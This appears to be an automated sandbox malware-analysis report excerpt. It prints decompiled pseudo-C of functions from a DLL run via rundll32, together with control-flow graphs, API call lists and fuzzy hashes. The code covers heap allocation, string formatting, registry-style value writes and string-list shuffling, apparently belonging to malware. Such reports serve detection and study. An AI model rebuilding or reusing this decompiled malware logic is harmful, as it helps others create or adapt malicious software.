                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID: Ut
                                • API String ID: 58946197-8415677
                                • Opcode ID: 467ce1b87a875f62e84e15244b99da3ab8a63e441512d3fe0e979e240c43afb5
                                • Instruction ID: e31e3f12b9619fb7b499b5f0be6a08342f4999f670f5aa3db185980545fd0bd1
                                • Opcode Fuzzy Hash: 467ce1b87a875f62e84e15244b99da3ab8a63e441512d3fe0e979e240c43afb5
                                • Instruction Fuzzy Hash: C4F0B7707262419BE714AF69F84CB2EBBA8EB04781B04840DF501DA2E2D728EC55DA25
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 303 4282f70-4282f8b call 42859a4 306 4282f8d-4282f9b 303->306 307 4282fa1-4282faf 303->307 306->307 309 4282fc1-4282fdc call 4282b6f 307->309 310 4282fb1-4282fb4 307->310 316 4282fde-4282fe4 309->316 317 4282fe6 309->317 310->309 311 4282fb6-4282fbb 310->311 311->309 313 4283142 311->313 315 4283144-428314a 313->315 318 4282fec-4283001 call 4289154 call 4288e0d 316->318 317->318 323 428300c-4283011 318->323 324 4283003-4283006 CloseHandle 318->324 325 4283013-4283018 323->325 326 4283037-428304f call 4281525 323->326 324->323 327 428312e-4283132 325->327 328 428301e 325->328 334 428307b-428307d 326->334 335 4283051-4283079 memset RtlInitializeCriticalSection 326->335 331 428313a-4283140 327->331 332 4283134-4283138 327->332 333 4283021-4283030 call 4288b7b 328->333 331->315 332->315 332->331 341 4283032 333->341 337 428307e-4283082 334->337 335->337 337->327 340 4283088-428309e RtlAllocateHeap 337->340 342 42830ce-42830d0 340->342 343 42830a0-42830cc wsprintfA 340->343 341->327 344 42830d1-42830d5 342->344 343->344 344->327 345 42830d7-42830f7 call 4287a2e call 4287fbe 344->345 345->327 350 42830f9-4283100 call 42850e8 345->350 353 4283102-4283105 350->353 354 4283107-428310e 350->354 353->327 355 4283110-4283112 354->355 356 4283123-4283127 call 4287c3d 354->356 355->327 357 4283114-4283121 call 42846b2 355->357 360 428312c 356->360 357->327 357->356 360->327
                                C-Code - Quality: 57%
                                			E04282F70(signed int __edx) {
                                				signed int _v8;
                                				long _v12;
                                				CHAR* _v16;
                                				long _v20;
                                				void* __edi;
                                				void* __esi;
                                				void* _t21;
                                				CHAR* _t22;
                                				CHAR* _t25;
                                				intOrPtr _t26;
                                				void* _t27;
                                				void* _t31;
                                				void* _t32;
                                				CHAR* _t36;
                                				CHAR* _t42;
                                				CHAR* _t43;
                                				CHAR* _t44;
                                				void* _t49;
                                				void* _t51;
                                				CHAR* _t54;
                                				signed char _t56;
                                				intOrPtr _t58;
                                				signed int _t59;
                                				void* _t62;
                                				CHAR* _t65;
                                				CHAR* _t66;
                                				char* _t67;
                                				void* _t68;
                                
                                				_t61 = __edx;
                                				_v20 = 0;
                                				_v8 = 0;
                                				_v12 = 0;
                                				_t21 = E042859A4();
                                				if(_t21 != 0) {
                                					_t59 =  *0x428d25c; // 0x4000000a
                                					_t55 = (_t59 & 0xf0000000) + _t21;
                                					 *0x428d25c = (_t59 & 0xf0000000) + _t21;
                                				}
                                				_t22 =  *0x428d160(0, 2); // executed
                                				_v16 = _t22;
                                				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                					_t25 = E04282B6F( &_v8,  &_v20); // executed
                                					_t54 = _t25;
                                					_t26 =  *0x428d2a8; // 0xaea5a8
                                					if( *0x428d25c > 5) {
                                						_t8 = _t26 + 0x428e5cd; // 0x4d283a53
                                						_t27 = _t8;
                                					} else {
                                						_t7 = _t26 + 0x428e9f5; // 0x44283a44
                                						_t27 = _t7;
                                					}
                                					E04289154(_t27, _t27);
                                					_t31 = E04288E0D(_t61,  &_v20,  &_v12); // executed
                                					if(_t31 == 0) {
                                						CloseHandle(_v20);
                                					}
                                					_t62 = 5;
                                					if(_t54 != _t62) {
                                						 *0x428d270 =  *0x428d270 ^ 0x81bbe65d;
                                						_t32 = E04281525(0x60);
                                						 *0x428d32c = _t32;
                                						__eflags = _t32;
                                						if(_t32 == 0) {
                                							_push(8);
                                							_pop(0);
                                						} else {
                                							memset(_t32, 0, 0x60);
                                							_t49 =  *0x428d32c; // 0x4d795b0
                                							_t68 = _t68 + 0xc;
                                							__imp__(_t49 + 0x40);
                                							_t51 =  *0x428d32c; // 0x4d795b0
                                							 *_t51 = 0x428e81a;
                                						}
                                						_t54 = 0;
                                						__eflags = 0;
                                						if(0 == 0) {
                                							_t36 = RtlAllocateHeap( *0x428d238, 0, 0x43);
                                							 *0x428d2c8 = _t36;
                                							__eflags = _t36;
                                							if(_t36 == 0) {
                                								_push(8);
                                								_pop(0);
                                							} else {
                                								_t56 =  *0x428d25c; // 0x4000000a
                                								_t61 = _t56 & 0x000000ff;
                                								_t58 =  *0x428d2a8; // 0xaea5a8
                                								_t13 = _t58 + 0x428e55a; // 0x697a6f4d
                                								_t55 = _t13;
                                								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x428c287);
                                							}
                                							_t54 = 0;
                                							__eflags = 0;
                                							if(0 == 0) {
                                								asm("sbb eax, eax");
                                								E04287A2E( ~_v8 &  *0x428d270,  &E0428D00C); // executed
                                								_t42 = E04287FBE(_t55); // executed
                                								_t54 = _t42;
                                								__eflags = _t54;
                                								if(_t54 != 0) {
                                									goto L30;
                                								}
                                								_t43 = E042850E8(); // executed
                                								__eflags = _t43;
                                								if(_t43 != 0) {
                                									__eflags = _v8;
                                									_t65 = _v12;
                                									if(_v8 != 0) {
                                										L29:
                                										_t44 = E04287C3D(_t61, _t65, _v8); // executed
                                										_t54 = _t44;
                                										goto L30;
                                									}
                                									__eflags = _t65;
                                									if(__eflags == 0) {
                                										goto L30;
                                									}
                                									_t54 = E042846B2(__eflags,  &(_t65[4]));
                                									__eflags = _t54;
                                									if(_t54 == 0) {
                                										goto L30;
                                									}
                                									goto L29;
                                								}
                                								_t54 = 8;
                                							}
                                						}
                                					} else {
                                						_t66 = _v12;
                                						if(_t66 == 0) {
                                							L30:
                                							if(_v16 == 0 || _v16 == 1) {
                                								 *0x428d15c();
                                							}
                                							goto L34;
                                						}
                                						_t67 =  &(_t66[4]);
                                						do {
                                						} while (E04288B7B(_t62, _t67, 0, 1) == 0x4c7);
                                					}
                                					goto L30;
                                				} else {
                                					_t54 = _t22;
                                					L34:
                                					return _t54;
                                				}
                                			}
































                                APIs
                                  • Part of subcall function 042859A4: GetModuleHandleA.KERNEL32(4C44544E,00000000,04282F89,00000000,00000000), ref: 042859B3
                                • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 04283006
                                  • Part of subcall function 04281525: RtlAllocateHeap.NTDLL(00000000,00000000,04281278), ref: 04281531
                                • memset.NTDLL ref: 04283055
                                • RtlInitializeCriticalSection.NTDLL(04D79570), ref: 04283066
                                  • Part of subcall function 042846B2: memset.NTDLL ref: 042846C7
                                  • Part of subcall function 042846B2: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04284709
                                  • Part of subcall function 042846B2: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 04284714
                                • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04283091
                                • wsprintfA.USER32 ref: 042830C1
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                • String ID:
                                • API String ID: 4246211962-0
                                • Opcode ID: 12ce115f4c7e27e7c727341bc02611a529f99f4719eae1458b380b06e35ae6a2
                                • Instruction ID: 25a755c25301541dae67f17cdcc8ea9e8c1ee2b0b97f4640243e0ac1bb4cc130
                                • Opcode Fuzzy Hash: 12ce115f4c7e27e7c727341bc02611a529f99f4719eae1458b380b06e35ae6a2
                                • Instruction Fuzzy Hash: 4751C671B33215ABEB21FBA5EC48B6E77A8EB04F14F10441DE905D71C1E6B9E944CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 362 4282d74-4282da1 call 4281525 365 4282ef5-4282ef7 362->365 366 4282da7-4282dad 362->366 368 4282ef8-4282efe 365->368 367 4282daf-4282db3 366->367 369 4282dfb-4282dfd 367->369 370 4282db5-4282db7 367->370 371 4282e0a-4282e0e 369->371 372 4282dff-4282e02 369->372 373 4282db9-4282dbb 370->373 374 4282de1-4282de3 370->374 380 4282ee8 371->380 381 4282e14-4282e2c call 4281525 371->381 377 4282e04 372->377 378 4282e07 372->378 373->374 379 4282dbd-4282dbf 373->379 375 4282df2 374->375 376 4282de5-4282de8 374->376 384 4282df5-4282df9 375->384 382 4282dea 376->382 383 4282ded-4282df0 376->383 377->378 378->371 386 4282dde-4282ddf 379->386 387 4282dc1-4282dc3 379->387 385 4282eea 380->385 395 4282e32-4282e42 381->395 396 4282ee4-4282ee6 381->396 382->383 383->375 384->367 384->369 389 4282eeb-4282ef3 call 4288b22 385->389 386->384 387->371 390 4282dc5-4282dd6 387->390 389->368 393 4282dd8 390->393 394 4282ddb-4282ddd 390->394 393->394 394->386 398 4282e48 395->398 399 4282eda-4282ee2 395->399 396->385 400 4282e4d-4282e94 lstrcpy lstrcat 398->400 399->389 401 4282e96-4282ea5 lstrcmp 400->401 402 4282eb7-4282ed4 lstrlen 400->402 403 4282eb4 401->403 404 4282ea7-4282eb0 401->404 402->399 402->400 403->402 404->401 405 4282eb2 404->405 405->402
                                C-Code - Quality: 22%
                                			E04282D74(signed int __eax, signed int _a4, signed int _a8) {
                                				signed int _v8;
                                				signed int _v12;
                                				intOrPtr _v16;
                                				signed int _v20;
                                				intOrPtr _t81;
                                				char _t83;
                                				signed int _t90;
                                				signed int _t97;
                                				signed int _t99;
                                				char _t101;
                                				unsigned int _t102;
                                				intOrPtr _t103;
                                				char* _t107;
                                				signed int _t110;
                                				signed int _t113;
                                				signed int _t118;
                                				signed int _t122;
                                				intOrPtr _t124;
                                
                                				_t102 = _a8;
                                				_t118 = 0;
                                				_v20 = __eax;
                                				_t122 = (_t102 >> 2) + 1;
                                				_v8 = 0;
                                				_a8 = 0;
                                				_t81 = E04281525(_t122 << 2);
                                				_v16 = _t81;
                                				if(_t81 == 0) {
                                					_push(8);
                                					_pop(0);
                                					L37:
                                					return 0;
                                				}
                                				_t107 = _a4;
                                				_a4 = _t102;
                                				_t113 = 0;
                                				while(1) {
                                					_t83 =  *_t107;
                                					if(_t83 == 0) {
                                						break;
                                					}
                                					if(_t83 == 0xd || _t83 == 0xa) {
                                						if(_t118 != 0) {
                                							if(_t118 > _v8) {
                                								_v8 = _t118;
                                							}
                                							_a8 = _a8 + 1;
                                							_t118 = 0;
                                						}
                                						 *_t107 = 0;
                                						goto L16;
                                					} else {
                                						if(_t118 != 0) {
                                							L10:
                                							_t118 = _t118 + 1;
                                							L16:
                                							_t107 = _t107 + 1;
                                							_t15 =  &_a4;
                                							 *_t15 = _a4 - 1;
                                							if( *_t15 != 0) {
                                								continue;
                                							}
                                							break;
                                						}
                                						if(_t113 == _t122) {
                                							L21:
                                							if(_a8 <= 0x20) {
                                								_push(0xb);
                                								L34:
                                								_pop(0);
                                								L35:
                                								E04288B22(_v16);
                                								goto L37;
                                							}
                                							_t24 = _v8 + 5; // 0xcdd8d2f8
                                							_t103 = E04281525((_v8 + _t24) * _a8 + 4);
                                							if(_t103 == 0) {
                                								_push(8);
                                								goto L34;
                                							}
                                							_t90 = _a8;
                                							_a4 = _a4 & 0x00000000;
                                							_v8 = _v8 & 0x00000000;
                                							_t124 = _t103 + _t90 * 4;
                                							if(_t90 <= 0) {
                                								L31:
                                								 *0x428d278 = _t103;
                                								goto L35;
                                							}
                                							do {
                                								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                                								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                                								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                                								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                                								_v12 = _v12 & 0x00000000;
                                								if(_a4 <= 0) {
                                									goto L30;
                                								} else {
                                									goto L26;
                                								}
                                								while(1) {
                                									L26:
                                									_t99 = _v12;
                                									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                                									if(_t99 == 0) {
                                										break;
                                									}
                                									_v12 = _v12 + 1;
                                									if(_v12 < _a4) {
                                										continue;
                                									}
                                									goto L30;
                                								}
                                								_v8 = _v8 - 1;
                                								L30:
                                								_t97 = _a4;
                                								_a4 = _a4 + 1;
                                								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                                								__imp__(_t124);
                                								_v8 = _v8 + 1;
                                								_t124 = _t124 + _t97 + 1;
                                							} while (_v8 < _a8);
                                							goto L31;
                                						}
                                						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                                						_t101 = _t83;
                                						if(_t83 - 0x61 <= 0x19) {
                                							_t101 = _t101 - 0x20;
                                						}
                                						 *_t107 = _t101;
                                						_t113 = _t113 + 1;
                                						goto L10;
                                					}
                                				}
                                				if(_t118 != 0) {
                                					if(_t118 > _v8) {
                                						_v8 = _t118;
                                					}
                                					_a8 = _a8 + 1;
                                				}
                                				goto L21;
                                			}

                                APIs
                                  • Part of subcall function 04281525: RtlAllocateHeap.NTDLL(00000000,00000000,04281278), ref: 04281531
                                • lstrcpy.KERNEL32(69B25F45,00000020), ref: 04282E71
                                • lstrcat.KERNEL32(69B25F45,00000020), ref: 04282E86
                                • lstrcmp.KERNEL32(00000000,69B25F45), ref: 04282E9D
                                • lstrlen.KERNEL32(69B25F45), ref: 04282EC1
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                • String ID:
                                • API String ID: 3214092121-3916222277
                                • Opcode ID: 50a769a67c3d540f2816133d48ec43a4a2f3892834537db8f7e57056025e8a5e
                                • Instruction ID: 4c35a955d300cf497413cc01c4fc1f7a3608e1dbdf8321359526350176a60d4e
                                • Opcode Fuzzy Hash: 50a769a67c3d540f2816133d48ec43a4a2f3892834537db8f7e57056025e8a5e
                                • Instruction Fuzzy Hash: F351D331B12109EBDF20EF99C8847ADBBB5FF55314F14809EE815AB281C770BA41CB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04285319(void* __edx) {
                                				void* _v8;
                                				int _v12;
                                				WCHAR* _v16;
                                				void* __edi;
                                				void* __esi;
                                				void* _t23;
                                				intOrPtr _t24;
                                				void* _t26;
                                				intOrPtr _t32;
                                				intOrPtr _t35;
                                				void* _t37;
                                				intOrPtr _t38;
                                				intOrPtr _t42;
                                				void* _t45;
                                				void* _t50;
                                				void* _t52;
                                
                                				_t50 = __edx;
                                				_v12 = 0;
                                				_t23 = E0428155A(0,  &_v8); // executed
                                				if(_t23 != 0) {
                                					_v8 = 0;
                                				}
                                				_t24 =  *0x428d2a8; // 0xaea5a8
                                				_t4 = _t24 + 0x428edc0; // 0x4d79368
                                				_t5 = _t24 + 0x428ed68; // 0x4f0053
                                				_t26 = E04285D79( &_v16, _v8, _t5, _t4); // executed
                                				_t45 = _t26;
                                				if(_t45 == 0) {
                                					StrToIntExW(_v16, 0,  &_v12);
                                					_t45 = 8;
                                					if(_v12 < _t45) {
                                						_t45 = 1;
                                						__eflags = 1;
                                					} else {
                                						_t32 =  *0x428d2a8; // 0xaea5a8
                                						_t11 = _t32 + 0x428edb4; // 0x4d7935c
                                						_t48 = _t11;
                                						_t12 = _t32 + 0x428ed68; // 0x4f0053
                                						_t52 = E0428272D(_t11, _t12, _t11);
                                						_t59 = _t52;
                                						if(_t52 != 0) {
                                							_t35 =  *0x428d2a8; // 0xaea5a8
                                							_t13 = _t35 + 0x428edfe; // 0x30314549
                                							_t37 = E04285B05(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
                                							if(_t37 == 0) {
                                								_t61 =  *0x428d25c - 6;
                                								if( *0x428d25c <= 6) {
                                									_t42 =  *0x428d2a8; // 0xaea5a8
                                									_t15 = _t42 + 0x428ec0a; // 0x52384549
                                									E04285B05(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                                								}
                                							}
                                							_t38 =  *0x428d2a8; // 0xaea5a8
                                							_t17 = _t38 + 0x428edf8; // 0x4d793a0
                                							_t18 = _t38 + 0x428edd0; // 0x680043
                                							_t45 = E04284538(_v8, 0x80000001, _t52, _t18, _t17);
                                							HeapFree( *0x428d238, 0, _t52);
                                						}
                                					}
                                					HeapFree( *0x428d238, 0, _v16);
                                				}
                                				_t54 = _v8;
                                				if(_v8 != 0) {
                                					E04284FF0(_t54);
                                				}
                                				return _t45;
                                			}

                                APIs
                                • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04D79368,00000000,?,74E5F710,00000000,74E5F730), ref: 04285368
                                • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04D793A0,?,00000000,30314549,00000014,004F0053,04D7935C), ref: 04285405
                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04287CCB), ref: 04285417
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeap
                                • String ID: Ut
                                • API String ID: 3298025750-8415677
                                • Opcode ID: fe61d6dcd772f47f5b816a86fe53407fc44f1a1a26685cd481170e2cd1efd846
                                • Instruction ID: 6f9f58a0c2127bbf8b0309e231b3e92b130d5df597649c1dc41a7201081128cc
                                • Opcode Fuzzy Hash: fe61d6dcd772f47f5b816a86fe53407fc44f1a1a26685cd481170e2cd1efd846
                                • Instruction Fuzzy Hash: 25318031B22119FFEB11AB94EC48E9EBBBDEF44754B15016DF500D70A1D770AA88DB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 57%
                                			E04282C58(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                				void* _v8;
                                				void* __edi;
                                				void* _t13;
                                				intOrPtr _t18;
                                				void* _t24;
                                				void* _t30;
                                				void* _t36;
                                				void* _t40;
                                				intOrPtr _t42;
                                
                                				_t36 = __edx;
                                				_t32 = __ecx;
                                				_push(__ecx);
                                				_push(__ecx);
                                				_t42 =  *0x428d340; // 0x4d79b20
                                				_push(0x800);
                                				_push(0);
                                				_push( *0x428d238);
                                				if( *0x428d24c >= 5) {
                                					_t13 = RtlAllocateHeap(); // executed
                                					if(_t13 == 0) {
                                						L6:
                                						_t30 = 8;
                                						L7:
                                						if(_t30 != 0) {
                                							L10:
                                							 *0x428d24c =  *0x428d24c + 1;
                                							L11:
                                							return _t30;
                                						}
                                						_t44 = _a4;
                                						_t40 = _v8;
                                						 *_a16 = _a4;
                                						 *_a20 = E04282C0D(_t44, _t40);
                                						_t18 = E042831A8(_t40, _t44);
                                						if(_t18 != 0) {
                                							 *_a8 = _t40;
                                							 *_a12 = _t18;
                                							if( *0x428d24c < 5) {
                                								 *0x428d24c =  *0x428d24c & 0x00000000;
                                							}
                                							goto L11;
                                						}
                                						_t30 = 0xbf;
                                						E04285433();
                                						HeapFree( *0x428d238, 0, _t40);
                                						goto L10;
                                					}
                                					_t24 = E04289BF1(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
                                					L5:
                                					_t30 = _t24;
                                					goto L7;
                                				}
                                				if(RtlAllocateHeap() == 0) {
                                					goto L6;
                                				}
                                				_t24 = E04285450(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25);
                                				goto L5;
                                			}

                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00000800,74E5F710), ref: 04282C7C
                                  • Part of subcall function 04285450: GetTickCount.KERNEL32 ref: 04285464
                                  • Part of subcall function 04285450: wsprintfA.USER32 ref: 042854B4
                                  • Part of subcall function 04285450: wsprintfA.USER32 ref: 042854D1
                                  • Part of subcall function 04285450: wsprintfA.USER32 ref: 042854FD
                                  • Part of subcall function 04285450: HeapFree.KERNEL32(00000000,?), ref: 0428550F
                                  • Part of subcall function 04285450: wsprintfA.USER32 ref: 04285530
                                  • Part of subcall function 04285450: HeapFree.KERNEL32(00000000,?), ref: 04285540
                                  • Part of subcall function 04285450: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0428556E
                                  • Part of subcall function 04285450: GetTickCount.KERNEL32 ref: 0428557F
                                • RtlAllocateHeap.NTDLL(00000000,00000800,74E5F710), ref: 04282C9A
                                • HeapFree.KERNEL32(00000000,00000002,04287D16,?,04287D16,00000002,?,?,0428312C,?), ref: 04282CF7
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$wsprintf$AllocateFree$CountTick
                                • String ID: Ut
                                • API String ID: 1676223858-8415677
                                • Opcode ID: 635775f502c5b7f007ad0d3c09a5ecaf457deaf30d6cf3ce6de1778732f78070
                                • Instruction ID: b7d38c131ae3d41148cf6094ecdb2e5f32d093e385196bc262d1e9a446cf0852
                                • Opcode Fuzzy Hash: 635775f502c5b7f007ad0d3c09a5ecaf457deaf30d6cf3ce6de1778732f78070
                                • Instruction Fuzzy Hash: DE214A75322205EBE701AF59E848AAE37ACEF54355F01405EF90196290DB74B9449B71
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SysAllocString.OLEAUT32(80000002), ref: 04288A76
                                • SysAllocString.OLEAUT32(04284BD8), ref: 04288ABA
                                • SysFreeString.OLEAUT32(00000000), ref: 04288ACE
                                • SysFreeString.OLEAUT32(00000000), ref: 04288ADC
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: String$AllocFree
                                • String ID:
                                • API String ID: 344208780-0
                                • Opcode ID: 4362e1fe43042441e1e2bf9b513daf8f627ada5fbefab759ccc3b1f1e2af91e6
                                • Instruction ID: 5fad78c57d2216640c046c92a3c11ec2ed3d71356ef9178fc918d0652df633cc
                                • Opcode Fuzzy Hash: 4362e1fe43042441e1e2bf9b513daf8f627ada5fbefab759ccc3b1f1e2af91e6
                                • Instruction Fuzzy Hash: 9F312172A11209EFDB04EF98D8C49AE7BB9FF48350B60842EF505D7290E775A941CF61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04285B05(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                				struct _FILETIME _v12;
                                				void* _t11;
                                				void* _t16;
                                				short _t19;
                                				void* _t22;
                                				void* _t24;
                                				void* _t25;
                                				short* _t26;
                                
                                				_t24 = __edx;
                                				_t25 = E04287B3B(_t11, _a12);
                                				if(_t25 == 0) {
                                					_t22 = 8;
                                				} else {
                                					_t26 = _t25 + _a16 * 2;
                                					 *_t26 = 0; // executed
                                					_t16 = E04282D2E(__ecx, _a4, _a8, _t25); // executed
                                					_t22 = _t16;
                                					if(_t22 == 0) {
                                						GetSystemTimeAsFileTime( &_v12);
                                						_t19 = 0x5f;
                                						 *_t26 = _t19;
                                						_t22 = E0428A38F(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
                                					}
                                					HeapFree( *0x428d238, 0, _t25);
                                				}
                                				return _t22;
                                			}

                                APIs
                                  • Part of subcall function 04287B3B: lstrlen.KERNEL32(?,00000000,04D79D18,00000000,04285142,04D79F3B,?,?,?,?,?,69B25F44,00000005,0428D00C), ref: 04287B42
                                  • Part of subcall function 04287B3B: mbstowcs.NTDLL ref: 04287B6B
                                  • Part of subcall function 04287B3B: memset.NTDLL ref: 04287B7D
                                • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,04D7935C), ref: 04285B3D
                                • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,04D7935C), ref: 04285B6B
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
• Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
• Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
• Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
• Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                • String ID: Ut
                                • API String ID: 1500278894-8415677
                                • Opcode ID: 6d8129eac1f5bdf721979979f03569f2cb6e67c890ec27432a53c045c9e64bd5
                                • Instruction ID: 34458b3442cd461e3336c94b5330bc94279a8b661bec3a08e26256517a72f999
                                • Opcode Fuzzy Hash: 6d8129eac1f5bdf721979979f03569f2cb6e67c890ec27432a53c045c9e64bd5
                                • Instruction Fuzzy Hash: 7D018831321209BBEB216F99DC44F9F7BB9EF84754F50402DFA009A1A4DB71E955C750
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 47%
                                			E04284A2A(char* _a4, char** _a8) {
                                				char* _t7;
                                				char* _t11;
                                				char* _t14;
                                				char* _t16;
                                				char* _t17;
                                				char _t18;
                                				signed int _t20;
                                				signed int _t22;
                                
                                				_t16 = _a4;
                                				_push(0x20);
                                				_t20 = 1;
                                				_push(_t16);
                                				while(1) {
                                					_t7 = StrChrA();
                                					if(_t7 == 0) {
                                						break;
                                					}
                                					_t20 = _t20 + 1;
                                					_push(0x20);
                                					_push( &(_t7[1]));
                                				}
                                				_t11 = E04281525(_t20 << 2);
                                				_a4 = _t11;
                                				if(_t11 != 0) {
                                					StrTrimA(_t16, 0x428c284); // executed
                                					_t22 = 0;
                                					do {
                                						_t14 = StrChrA(_t16, 0x20);
                                						if(_t14 != 0) {
                                							 *_t14 = 0;
                                							do {
                                								_t14 =  &(_t14[1]);
                                								_t18 =  *_t14;
                                							} while (_t18 == 0x20 || _t18 == 9);
                                						}
                                						_t17 = _a4;
                                						 *(_t17 + _t22 * 4) = _t16;
                                						_t22 = _t22 + 1;
                                						_t16 = _t14;
                                					} while (_t14 != 0);
                                					 *_a8 = _t17;
                                				}
                                				return 0;
			}

